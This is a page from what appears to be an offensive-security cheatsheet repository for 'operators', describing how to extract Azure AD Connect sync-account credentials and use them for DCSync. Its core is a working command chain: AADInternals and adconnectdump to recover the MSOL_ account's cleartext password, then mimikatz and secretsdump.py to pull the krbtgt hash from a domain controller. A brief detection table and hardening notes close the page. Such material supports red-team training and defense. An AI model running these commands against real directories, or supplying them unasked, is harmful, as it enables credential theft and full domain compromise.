daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-74-azure-ad-connect-credential-extraction.md (3187B)


      1 ---
      2 title: "Attack #74 β€” Azure AD Connect Credential Extraction"
      3 description: "Azure AD Connect synchronizes on-premises AD with Azure AD / Entra ID. The sync service stores a privileged AD account's credentials (the MSOL_ account or…"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory", "credential-access", "privilege-escalation", "sql-injection"]
      7 tools: ["Impacket", "Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/πŸ”· Attack #74 β€” Azure AD Connect Credential Extraction.md"
     11 ---
     12 # πŸ”· Attack #74 β€” Azure AD Connect Credential Extraction
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Azure AD Connect synchronizes on-premises AD with Azure AD / Entra ID. The sync service stores a **privileged AD account's credentials** (the MSOL_ account or ADSync account) in a local database (encrypted with DPAPI). This account typically has **DCSync rights by default** β€” extracting its credentials from the Azure AD Connect server grants immediate DCSync capability.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Local admin on Azure AD Connect server** | To access the encrypted database |
     27 | **Azure AD Connect installed** | With on-prem sync configured |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```powershell
     34 # ── AADInternals (PowerShell) ─────────────────────────────────────────────────
     35 Install-Module AADInternals -Force
     36 Import-Module AADInternals
     37 Get-AADIntSyncCredentials
     38 # Output:
     39 # Domain: corp.local
     40 # Username: MSOL_<hex>
     41 # Password: <cleartext_password>
     42 
     43 # ── adconnectdump (manual extraction) ─────────────────────────────────────────
     44 .\adconnectdump.exe
     45 # Extracts MSOL_ credentials from the local SQL database
     46 
     47 # ── Now DCSync with the MSOL_ account ─────────────────────────────────────────
     48 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit
     49 # MSOL_ account has DCSync rights by default
     50 ```
     51 
     52 ```bash
     53 # ── From Linux (after extracting credentials) ─────────────────────────────────
     54 secretsdump.py corp.local/MSOL_<hex>:'<password>'@DC01.corp.local -just-dc-user krbtgt
     55 ```
     56 
     57 ***
     58 
     59 ## πŸ›‘οΈ Detection β€” Event IDs
     60 
     61 | Event ID | Source | What to Look For |
     62 |---|---|---|
     63 | **4662** | Security Log (DC) | MSOL_ account performing replication |
     64 | **4624** | Security Log | MSOL_ logon from unexpected source (not the AD Connect server) |
     65 
     66 ***
     67 
     68 ## πŸ”— Attack Chain Context
     69 
     70 ```
     71 [Azure AD Connect] ──→ Extract MSOL_ creds β†’ DCSync β†’ domain compromise
     72          β”‚
     73          β”œβ”€β”€β†’ πŸ”‘ MSOL_ account has DCSync rights by DEFAULT
     74          β”œβ”€β”€β†’ πŸ”— Compromise AD Connect server β†’ full domain compromise
     75          └──→ πŸ’€ Defeated by: harden AD Connect server, use gMSA for sync, monitor MSOL_ usage
     76 ```
     77 
     78 ***
     79 
     80 > βœ… **Attack #74 β€” Azure AD Connect complete.**